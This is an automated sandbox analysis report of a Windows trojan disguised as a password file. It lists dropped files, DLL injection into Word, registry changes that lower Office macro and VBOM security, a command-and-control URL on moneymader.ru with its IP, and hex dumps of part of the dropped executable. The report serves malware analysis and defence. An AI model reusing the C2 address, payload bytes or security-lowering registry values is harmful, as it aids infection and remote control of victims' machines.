JBX Analysis Report

General Information
Analysis ID: 19541
Start time: 19:54:27
Start date: 09/09/2012
Overall analysis duration: 0h 6m 16s
Sample file name: New_password-1eb4cd066eb69b63e74387a82443d998.exe
Cookbook file name: Long Wait.jbs
Analysis system description: XP SP3 (Office 2003 SP2, Java 1.6.0, Acrobat Reader 9.3.4, Internet Explorer 8)
Number of analysed new started processes analysed: 3
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Warnings:
  • Too many NtAllocateVirtualMemory calls (excessive behavior)
  • Too many NtUserMessageCall calls (excessive behavior)

Classification / Threat Score
Persistence, Installation, Boot Survival :
Hiding, Stealthiness, Detection and Removal Protection :
Security Solution / Mechanism bypass, termination and removal, Anti Debugging, VM Detection :
Spreading :
Exploiting :
Networking :
Data spying, Sniffing, Keylogging, Ebanking Fraud :

Matching Signatures
Creates files inside the user directory
Creates temporary files
Printf formatting strings found in memory and binary data
Spawns processes
Urls found in memory or binary data
Creates an autostart registry key
Creates files inside the system directory
Creates mutexes \BaseNamedObjects\Local\Mso97SharedDg19211106568_S-1-5-21-507921405-1960408961-839522115-500Mutex \BaseNamedObjects\Local\Mutex_MSOSharedMem \BaseNamedObjects\Local\Mso97SharedDg20321106568_S-1-5-21-507921405-1960408961-839522115-500Mutex \BaseNamedObjects\Local\Mso97SharedDg19521106568_S-1-5-21-507921405-1960408961-839522115-500Mutex \BaseNamedObjects\3408630516cb2b92f4 \BaseNamedObjects\Local\SqmSysTray
Deletes itself after installation
Downloads files from webservers via HTTP
Drops PE files
PE file contains sections with non-standard names
PE sections with suspicious entropy found
Performs DNS lookups
Injects Dlls into Windows application C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp -> C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE
Maps a DLL or memory area into another process
Modifies Office VBOM (Visual Basic Object Model) security settings
Modifies Office macro security settings
Queues an APC in another process (thread injection)

Startup
  • system is xp
  • WINWORD.EXE (PID: 1680 MD5: 7A0FA3A0282B4630F3768A74441D4BAE)
    • svchost.exe (PID: 1744 MD5: 27C6D03BCDB8CFEB96B716F3D8BE3E18)
  • cleanup

Created / dropped Files
File Path MD5
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp 480AD1B1B4F71A6A1BE2F6FAC143A42A
C:\Documents and Settings\Administrator\Application Data\Microsoft\Office\VB11.pip 3D04C6263F770B2AD9A980043230EBBE
C:\Documents and Settings\Administrator\Application Data\Microsoft\Templates\~$Normal.dot 05A02048D6F36640223C02FE5E3F1D00
C:\WINDOWS\system32\hyli.igo 480AD1B1B4F71A6A1BE2F6FAC143A42A
C:\WINDOWS\system32\hyli.igo (copy) 480AD1B1B4F71A6A1BE2F6FAC143A42A

Contacted Domains
Name IP Name Server Active Registrar e-Mail
moneymader.ru 88.214.232.128 ns2.moneymader.ru ns1.moneymader.ru true unknown unknown

Contacted IPs
IP Country Pingable Open Ports
88.214.232.128 UNITED KINGDOM true 21 80
195.186.1.121 SWITZERLAND false
195.186.4.121 SWITZERLAND false

Static File Info
File type: PE32 executable (GUI) Intel 80386, for MS Windows
File name: New_password-1eb4cd066eb69b63e74387a82443d998.exe
File size: 42496
MD5: 1eb4cd066eb69b63e74387a82443d998
SHA1: a90832f0e6649426875d1916cfe606a042b354aa
SHA256: e52a9808521c1ed027c2c8bca232646f4634455a8b226c9812f1fe2fcd0a6d0f
SHA512: f4533d959b6c787a8a14370eb5f4ac5afffae47529838f65269206f48227e7fd778702736fa1928df902a165dc542b086ddf03f0fcb7fe02d8793d5f23812b71

Static PE Info
General
Entrypoint: 0x4010b0
Entrypoint Section: .text
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: TERMINAL_SERVER_AWARE, NO_SEH
Time Stamp: 0x4C92075C [Thu Sep 16 12:02:36 2010 UTC]
TLS Callbacks:
Resources
Name RVA Size Type Language Country
RT_ICON 0xe518 0xea8 data English United States
RT_DIALOG 0xf3d8 0x2e data English United States
RT_GROUP_ICON 0xf3c0 0x14 MS Windows icon resource - 1 icon English United States
RT_VERSION 0xe190 0x14c 80386 COFF executable not stripped - version 79 English United States
RT_MANIFEST 0xe2e0 0x232 XML document text English United States
Imports
DLL Import
KERNEL32.dll GetModuleHandleA, GetProcAddress, GetCommandLineA, CloseHandle, VirtualAlloc, lstrcpyA, LoadLibraryA
Sections
Name Virtual Address Virtual Size Raw Size Entropy
.text 0x1000 0xc98 0xe00 5.60291887063
.data 0x2000 0x72d0 0x7400 5.44666449829
.data0 0xa000 0x18 0x200 0.322488410335
.data1 0xb000 0x18 0x200 0.335736224849
.data2 0xc000 0x18 0x200 0.322488410335
.data3 0xd000 0x18 0x200 0.322488410335
.rsrc 0xe000 0x1408 0x1600 5.4089687542
.reloc 0x10000 0x164 0x200 3.09199427013
Version Infos
Description Data
FileVersion 00.4.9.96
ProductVersion 8.69.82.36
Translation 0x0804 0x0000
Possible Origin
Language of compilation system Country where language is spoken Map
English United States

String Analysis
Formattings for printf style functions
String value Source
%SystemRoot%\System32\mswsock.dll svchost.exe
%s\%s\%s\%s\%s svchost.exe
|%SystemRoot%\system32\rsvpsp.dll svchost.exe
%v Omd "%u"(EyBdo w CU Vtxlqk) Cu Ootj hyli.igo0.dr, 72.tmp.dr, hyli.igo.dr
Pw%n[w svchost.exe
%ls %ls svchost.exe
%SystemRoot%\Debug\UserMode\userenv.bak svchost.exe
%systemroot%\system32\com\dmp New_password-1eb4cd066eb69b63e74387a82443d998.exe
uxrfno38.hai %u cwknqw hyli.igo0.dr, 72.tmp.dr, hyli.igo.dr
%s\%s\%s\%s\%s\%s svchost.exe
Assertion failed: %s, file %s, line %d New_password-1eb4cd066eb69b63e74387a82443d998.exe, svchost.exe
%d %d %d %d svchost.exe
%SystemRoot%\Debug\UserMode\userenv.log svchost.exe
IVO28%dtw8QxVeJ2QUcN}lT]jI{jf(=1&L[-81-]66x5zbkkf(7)dqFgkW_BptK&IY9)z@'Ya0g)+vX'HDI1hlAB*Av(Q&g3&VT!fh'!$t.%,A3.*0lTwZD0wv$wmN+.f=.37iv!-jbM^P$OHQ55'Ah=J][6]2.`Q)@hUlM.?=m~Nj*ECtw0pl%6?*zSI?kbKH?q@[=1uvG8D)8DZ9=]3pfHL}{f97s]o?OVu@NuCskaR*]2b8'80pIMk?~~O9=KQ=l3 New_password-1eb4cd066eb69b63e74387a82443d998.exe
%SystemRoot%\system32\rsvpsp.dll svchost.exe
%systemroot%\Registration New_password-1eb4cd066eb69b63e74387a82443d998.exe
%SystemRoot%\System32\winrnr.dll svchost.exe
JHX /%u %u%v %s hyli.igo0.dr, 72.tmp.dr, hyli.igo.dr
%SystemRoot%\system32\mswsock.dll svchost.exe
DragDrop%lx New_password-1eb4cd066eb69b63e74387a82443d998.exe, svchost.exe
URLs
String value Source
http://moneymader.ru/group/mixer/bb.php svchost.exe
http://office.bcentral.com/eservices/error?dpc=%productcode%&dcc=%appcomponentcode%&appname=%applicationname%&clcid=%uilang%&helplcid=%helplang% WINWORD.EXE
http://officeupdate.microsoft.com WINWORD.EXE
http://schemas.microsoft.com/sharepoint/soap/directory/ WINWORD.EXE
http://schemas.xmlsoap.org/soap/envelope/ WINWORD.EXE
http://www.w3.org/2001/xmlschema WINWORD.EXE
http://www.w3.org/2001/xmlschema-instance WINWORD.EXE
https://office.bcentral.com/eservices/index?dpc=%productcode%&dcc=%appcomponentcode%&appname=%applicationname%&clcid=%uilang%&helplcid=%helplang% WINWORD.EXE
https://office.bcentral.com/eservices/service?command=webpost&dpc=%productcode%&dcc=%appcomponentcode%&appname=%applicationname%&clcid=%uilang%&helplcid=%helplang% WINWORD.EXE

Network Behavior
TCP Packets
Timestamp Source Port Dest Port Source IP Dest IP
Sep 9, 2012 19:57:50.692679882 CEST 1039 80 192.168.0.10 88.214.232.128
Sep 9, 2012 19:57:50.692706108 CEST 80 1039 88.214.232.128 192.168.0.10
Sep 9, 2012 19:57:50.693042994 CEST 1039 80 192.168.0.10 88.214.232.128
Sep 9, 2012 19:57:50.693845034 CEST 1039 80 192.168.0.10 88.214.232.128
Sep 9, 2012 19:57:50.693859100 CEST 80 1039 88.214.232.128 192.168.0.10
Sep 9, 2012 19:57:51.466325998 CEST 80 1039 88.214.232.128 192.168.0.10
Sep 9, 2012 19:57:51.467135906 CEST 1039 80 192.168.0.10 88.214.232.128
Sep 9, 2012 19:57:51.467197895 CEST 80 1039 88.214.232.128 192.168.0.10
Sep 9, 2012 19:57:51.467570066 CEST 1039 80 192.168.0.10 88.214.232.128
UDP Packets
Timestamp Source Port Dest Port Source IP Dest IP
Sep 9, 2012 19:57:49.265110970 CEST 61120 53 192.168.0.10 195.186.1.121
Sep 9, 2012 19:57:50.264120102 CEST 61120 53 192.168.0.10 195.186.4.121
Sep 9, 2012 19:57:50.673702002 CEST 53 61120 195.186.4.121 192.168.0.10
Sep 9, 2012 19:57:50.761223078 CEST 53 61120 195.186.1.121 192.168.0.10
ICMP Packets
Timestamp Source IP Dest IP Checksum Code Type
Sep 9, 2012 19:57:50.761780977 CEST 192.168.0.10 195.186.1.121 832b (Port unreachable) Destination Unreachable
DNS Queries
Timestamp Source IP Dest IP Trans ID OP Code Name Type Class
Sep 9, 2012 19:57:49.265110970 CEST 192.168.0.10 195.186.1.121 0x2cd5 Standard query (0) moneymader.ru A (IP address) IN (0x0001)
Sep 9, 2012 19:57:50.264120102 CEST 192.168.0.10 195.186.4.121 0x2cd5 Standard query (0) moneymader.ru A (IP address) IN (0x0001)
DNS Answers
Timestamp Source IP Dest IP Trans ID Replay Code Name CName Address Type Class
Sep 9, 2012 19:57:50.673702002 CEST 195.186.4.121 192.168.0.10 0x2cd5 No error (0) moneymader.ru 88.214.232.128 A (IP address) IN (0x0001)
Sep 9, 2012 19:57:50.761223078 CEST 195.186.1.121 192.168.0.10 0x2cd5 No error (0) moneymader.ru 88.214.232.128 A (IP address) IN (0x0001)
HTTP Request Dependency Graph
  • moneymader.ru
HTTP Packets
Timestamp Source Port Dest Port Source IP Dest IP Header Total Bytes Transfered (KB)
Sep 9, 2012 19:57:50.693845034 CEST 1039 80 192.168.0.10 88.214.232.128 GET /group/mixer/bb.php?v=200&id=436373810&b=16sentab&tm=24 HTTP/1.1
User-Agent: Opera\9.64Host: moneymader.ru
 0
Sep 9, 2012 19:57:51.466325998 CEST 80 1039 88.214.232.128 192.168.0.10 HTTP/1.1 404 Not Found
Date: Sun, 09 Sep 2012 17:57:51 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.17
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
 1

Code Manipulation Behavior

System Behavior

Analysis File: New_password-1eb4cd066eb69b63e74387a82443d998.exe PID: 1764 Parent PID: 956

General
Start time: 09:39:48
Start date: 24/01/2012
Path: C:\New_password-1eb4cd066eb69b63e74387a82443d998.exe
Wow64 process (32bit): false
Commandline: unknown
Imagebase: 0x400000
File size: 42496 bytes
MD5 hash: 1EB4CD066EB69B63E74387A82443D998

File Activites
File Opened
File Path Access Options Content overwritten Completion Count Source Address Symbol
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp read attributes and synchronize and generic write synchronous io non alert and non directory file true success or wait 1 40235C CreateFileA
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp read attributes and synchronize and generic read sequential only and synchronous io non alert and non directory file and open reparse point true success or wait 1 1000116C CopyFileA
C:\WINDOWS\system32\hyli.igo read attributes and delete and synchronize and generic write sequential only and synchronous io non alert and non directory file true success or wait 1 1000116C CopyFileA
File Created
File Path Access Attributes Options Completion Count Source Address Symbol
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp read attributes and synchronize and generic read normal synchronous io non alert and non directory file success or wait 1 4022D9 GetTempFileNameA
File Copied
Old File Path New File Path Completion Count Source Address Symbol
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp C:\WINDOWS\system32\hyli.igo success or wait 1 1000116C CopyFileA
File Written
File Path Offset Length Value Completion Count Source Address Symbol
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 55 89 E5 53 83 EC 44 C6 45 F5 25 C6 45 F6 78 C6 45 F3 25 C6 45 F4 75 C6 45 F7 00 C7 44 24 0C F4 92 2B CB C7 44 24 08 F4 92 2B CB 8D 45 F3 89 44 24 04 8D 5D D3 89 1C 24 FF 15 8C 82 00 10 89 5C 24 08 C7 44 24 04 00 00 00 00 C7 04 24 00 00 00 00 FF 15 2C 82 00 10 83 EC 0C 89 C3 FF 15 7C 82 00 10 3D B7 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 C7 04 24 0E 00 00 00 E8 50 21 00 00 84 C0 75 08 8D 65 F4 5B 5E 5F C9 C3 8B 1D EC 82 00 10 09 F3 8D BD A0 FD FF FF 89 7C 24 04 C7 04 24 0C 00 00 00 E8 4A 35 00 00 8B 15 8C 82 00 10 89 95 90 FD FF FF A1 EC 82 00 10 B1 64 D3 F8 89 FA 29 C2 89 D0 83 C0 64 89 44 24 04 C7 04 24 0B 00 00 00 E8 1C 35 00 00 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 E4 00 00 00 80 BD 87 EB FF FF 00 0F 84 C3 00 00 00 85 C0 7E 42 31 F6 EB 28 8D 76 00 A1 EC 82 00 10 B1 E8 D3 F8 89 DA 29 C2 01 D6 C7 04 24 E8 03 00 00 FF 15 80 82 00 10 51 39 B5 B4 EB FF FF 7E 16 E8 EE 17 00 00 83 F8 02 75 D1 A1 EC 82 00 10 8D 3C 85 02 00 00 00 83 FF 02 0F 84 AA 00 00 00 C7 04 24 01 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 B5 F0 FC FF FF B1 96 F3 A5 89 04 24 FF 15 6C 82 00 10 50 8D 85 48 FF FF FF 89 44 24 04 C7 04 24 00 00 00 00 E8 57 2D 00 00 8D 55 C8 89 54 24 08 C7 44 24 04 04 00 00 00 89 04 24 E8 BC FD FF FF C7 45 E4 00 00 00 00 C7 45 E0 00 00 00 00 C7 45 D8 00 00 00 00 C7 45 DC 00 00 00 00 8B 85 E0 FC FF FF 89 44 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 74 3A 39 F2 77 22 8D 41 04 8D 76 00 39 C2 76 0E 89 C1 80 39 3A 74 D1 8D 41 01 39 C2 77 F2 31 C0 5B 5E 5F C9 C3 8D 76 00 89 F0 66 90 40 80 38 2F 74 0C 39 C2 77 F6 8D 46 01 EB D1 90 89 F0 39 C2 76 F4 C6 00 00 8D 78 01 8A 40 01 3C 0D 74 21 3C 0A 74 1D 39 FA 76 DF 89 F9 8D 76 00 41 8A 01 3C 0D 74 0F 3C success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 89 04 24 FF 15 A8 82 00 10 83 EC 10 85 C0 74 66 01 C3 85 DB 7F 9A EB C9 84 C9 74 AD 89 F2 84 D2 75 07 BE 01 00 00 00 EB A0 47 74 B0 8D 45 E4 89 44 24 08 89 7C 24 04 8D 95 E0 F7 FF FF 89 14 24 E8 8B FB FF FF 85 C0 0F 85 3B 01 00 00 80 3F 3C 74 24 8B 55 14 C6 02 00 8D 85 E0 F7 FF FF 89 44 24 04 C7 04 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 5C 24 04 89 04 24 FF 15 C0 82 00 10 83 EC 24 8B 45 F4 8B 5D FC C9 C3 90 55 89 E5 57 56 53 81 EC AC 00 00 00 8B 75 0C 8B 7D 10 8B 45 08 89 04 24 E8 5B FF FF FF 89 C3 85 C0 74 61 85 FF 74 14 8D 85 68 FF FF FF 89 44 24 04 89 3C 24 E8 8B 1F 00 00 89 C6 8B 45 1C 89 44 24 14 8B 45 18 89 44 24 10 8B 45 14 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 24 FF 15 A8 82 00 10 83 EC 10 89 85 E4 F7 FF FF C6 84 05 E8 F7 FF FF 00 85 C0 7E 36 89 C2 4A 31 FF 31 F6 8D 85 E8 F7 FF FF 89 D9 89 F3 89 CE EB 12 8D 76 00 80 F9 0A 74 43 31 FF 31 DB 85 D2 74 0F 40 4A 8A 08 80 F9 0D 75 EA B3 01 85 D2 75 F1 89 F3 8B 55 08 C7 82 4C 09 00 00 00 00 00 00 89 1C 24 FF 15 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 00 C7 44 24 14 04 00 00 00 8D 55 08 89 54 24 10 C7 44 24 0C 04 00 00 00 89 5C 24 08 C7 44 24 04 00 00 00 00 89 04 24 E8 EC F7 FF FF 83 C4 24 5B C9 C3 66 90 55 89 E5 53 83 EC 34 C7 45 F4 00 00 00 00 C7 04 24 14 00 00 00 E8 66 17 00 00 89 C3 C7 04 24 12 00 00 00 E8 58 17 00 00 C7 44 24 14 04 00 00 00 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 10 75 E6 8B 45 08 C7 80 24 08 00 00 01 00 00 00 C7 80 48 08 00 00 00 00 00 00 C7 44 24 04 10 50 00 10 83 C0 14 89 04 24 FF 15 EC 81 00 10 83 EC 08 8B 55 08 80 7A 05 00 75 48 8B 82 24 08 00 00 EB 20 66 90 8B 5D 08 8B 83 24 08 00 00 89 C2 C1 E2 07 01 C2 80 7C 13 14 00 74 27 40 89 83 24 08 00 00 89 44 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 8B 55 0C 89 54 24 04 89 04 24 FF 15 FC 81 00 10 83 EC 08 85 C0 0F 94 C0 8D 65 F8 5E 5F C9 C3 90 55 89 E5 57 56 53 83 EC 6C 8B 55 0C 80 3A 3A 74 1F 3B 55 10 73 10 89 D6 8B 45 10 90 46 80 3E 3A 74 10 39 F0 77 F6 83 C4 6C 5B 5E 5F C9 C3 66 90 89 D6 39 75 10 76 EF A1 20 80 00 10 85 C0 74 E6 89 F7 29 D7 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 E8 7B 0D 00 00 89 44 24 04 89 34 24 FF 95 64 FE FF FF 83 EC 08 8A 03 84 C0 0F 84 91 00 00 00 31 C9 8D 76 00 8D 50 D0 80 FA 09 77 0A 8D 14 89 0F BE C0 8D 4C 50 D0 43 8A 03 84 C0 75 E7 83 F9 77 7E 6E 8D 5D B0 89 5C 24 04 C7 04 24 1A 00 00 00 E8 2B 0D 00 00 8D 45 E0 89 44 24 20 8D 45 E4 89 44 24 1C C7 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 51 04 00 00 A1 E0 81 00 10 E8 7A FA FF FF C7 04 24 88 13 00 00 FF 15 80 82 00 10 51 8D 4D E0 8D 55 E4 89 F8 E8 47 FB FF FF E9 19 FF FF FF 66 90 8D 45 A0 89 44 24 08 C7 44 24 04 00 00 00 00 C7 04 24 00 00 00 00 B9 01 00 00 00 BA 0E 00 00 00 8B 45 A8 E8 30 FA FF FF 85 C0 0F 85 6B FF FF FF 8B 45 A8 85 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 89 7C 24 0C C7 44 24 08 00 00 00 00 8B 85 64 FF FF FF 89 44 24 04 8B 02 89 04 24 89 95 5C FF FF FF E8 96 00 00 00 89 03 89 7C 24 04 8B 85 64 FF FF FF 89 04 24 E8 8A 05 00 00 83 EC 08 89 03 83 C3 04 8B 95 5C FF FF FF 83 C2 04 46 8B 85 60 FF FF FF 39 34 C5 20 52 00 10 7F A5 89 D6 FF 85 60 FF FF FF 83 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 84 C0 0F 84 70 01 00 00 8B 7D 0C C7 45 E8 00 00 00 00 66 90 FF 45 08 85 DB 0F 84 45 01 00 00 B8 61 00 00 00 31 D2 F7 75 EC 38 45 F3 0F 8D B6 00 00 00 66 90 B8 41 00 00 00 88 D9 D3 E8 38 45 F3 0F 8C CA 00 00 00 80 7D F3 5A 0F 8F C0 00 00 00 89 D8 B1 5A D3 E0 8D 48 5A 88 4D E7 BA 41 00 00 00 BE 41 00 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 AA BF 5B 1E C6 BA A6 BF 45 90 AB B0 F8 B4 B8 C4 C2 CB 2F 6E FC 95 89 D2 2A FE CE C9 95 D5 DC A1 D8 91 29 6B E9 DD D4 D0 30 E0 84 DD 91 CC DD B6 85 DD 39 30 B6 D2 D6 BF 88 6E ED F7 AB 5D 1B F2 9B 89 28 7B A8 CE C7 DD 45 FE 3D DC 82 83 D6 C4 00 90 40 00 00 00 00 00 00 00 00 00 00 00 00 00 04 70 00 10 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 00 4F 68 7A 67 6E 00 59 45 45 59 63 75 6E 6F 71 6A 77 00 44 66 67 67 75 76 56 48 52 50 00 74 79 6F 71 75 62 00 47 68 67 6E 63 75 65 20 4C 78 71 67 76 6B 72 6E 20 77 79 6E 73 75 61 00 25 76 20 4F 6D 64 20 22 25 75 22 28 45 79 42 64 6F 20 77 20 43 55 20 56 74 78 6C 71 6B 29 20 43 75 20 4F 6F 74 6A 0D success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 00 00 00 00 36 3F 91 4C 00 00 00 00 6E 90 00 00 01 00 00 00 07 00 00 00 07 00 00 00 28 90 00 00 44 90 00 00 60 90 00 00 9C 10 00 00 E0 10 00 00 E8 10 00 00 F4 15 00 00 0C 16 00 00 D8 16 00 00 70 15 00 00 78 90 00 00 80 90 00 00 8A 90 00 00 95 90 00 00 9C 90 00 00 A3 90 00 00 AA 90 00 00 00 00 01 00 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 00 10 00 00 A8 00 00 00 3A 30 53 30 5E 30 75 30 92 30 A9 30 BF 30 FA 30 16 31 40 31 46 31 75 31 87 31 93 31 99 31 C3 31 D0 31 DE 31 E4 31 08 32 0E 32 2F 32 51 32 69 32 72 32 BB 32 E3 32 37 33 5C 33 78 33 8A 33 E4 33 1A 34 38 34 43 34 98 34 AD 34 D7 34 EC 34 F8 34 06 35 93 35 AA 35 B1 35 C0 35 C6 35 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 0 unknown success or wait 1 4018C9 WriteFile
File Path Offset Length Value Completion Count Source Address Symbol
File Path Disposition Data Ascii Data Completion Count Source Address Symbol

Section Activites
Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
unknown query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 270000 90112 own pid readonly success or wait 1
\NLS\NlsSectionLocale read unknown 290000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 2E0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 330000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\rpcss.dll write and read and execute commit AF0000 401408 own pid execute success or wait 1
C:\WINDOWS\system32\msctf.dll write and read and execute commit AF0000 299008 own pid execute success or wait 1
C:\WINDOWS\system32\msctf.dll query and write and read and execute image 74720000 311296 own pid read write success or wait 1
\BaseNamedObjects\CiceroSharedMemDefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read commit unknown unknown unknown unknown object name exists 1
\BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500SFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown AF0000 262144 own pid read write success or wait 1
\KnownDlls\CLBCATQ.DLL write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\clbcatq.dll query and write and read and execute image 76FD0000 520192 own pid read write success or wait 1
\KnownDlls\COMRes.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\comres.dll query and write and read and execute image 77050000 806912 own pid read write success or wait 1
\KnownDlls\VERSION.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
\KnownDlls\msi.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msi.dll query and write and read and execute image 7D1E0000 2867200 own pid read write success or wait 1
C:\WINDOWS\system32\winlogon.exe write and read and execute commit B30000 507904 own pid execute success or wait 1
\KnownDlls\xpsp2res.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\xpsp2res.dll query and write and read and execute image B30000 2904064 own pid read write conflicting addresses 1
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp query and write and read and execute and extend size commit 3F0000 24576 own pid readonly success or wait 1
Section loaded by Program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
\KnownDlls\advapi32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1 40111F
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1 40111F
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1 40111F
unknown query and write and read commit 400000 0 own pid execute and read and write access denied 1 351410
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1 351471
\NLS\NlsSectionCType read unknown 390000 12288 own pid readonly success or wait 1 351471
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp write and read and execute commit 3A0000 24576 own pid execute success or wait 1 401949
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp query and write and read and execute image 10000000 49152 own pid read write success or wait 1 401949
\KnownDlls\user32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1 100043DD
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1 100043DD
C:\WINDOWS\system32\imm32.dll write and read and execute commit 3A0000 110592 own pid execute success or wait 1 100043DD
C:\WINDOWS\system32\imm32.dll write and read and execute commit 3A0000 110592 own pid execute success or wait 1 100043DD
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1 100043DD
\KnownDlls\ws2_32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1 100043DD
C:\WINDOWS\system32\ws2_32.dll query and write and read and execute image 71AB0000 94208 own pid read write success or wait 1 100043DD
\KnownDlls\WS2HELP.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1 100043DD
C:\WINDOWS\system32\ws2help.dll query and write and read and execute image 71AA0000 32768 own pid read write success or wait 1 100043DD
\KnownDlls\iphlpapi.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1 100043DD
C:\WINDOWS\system32\iphlpapi.dll query and write and read and execute image 76D60000 102400 own pid read write success or wait 1 100043DD
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1 100043DD
\KnownDlls\oleaut32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1 100043DD

Registry Activites
Key Created
Key Path Completion Count Source Address Symbol
HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security success or wait 1 10003C9C RegCreateKeyExA
Key Value Created
Key Path Name Type Data Completion Count Source Address Symbol
HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security Level dword 1 success or wait 1 10003DA8 RegSetValueExA
HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security AccessVBOM dword 1 success or wait 1 10003E06 RegSetValueExA
Key Value Modified
Key Path Name Type Old Data New Data Completion Count Source Address Symbol
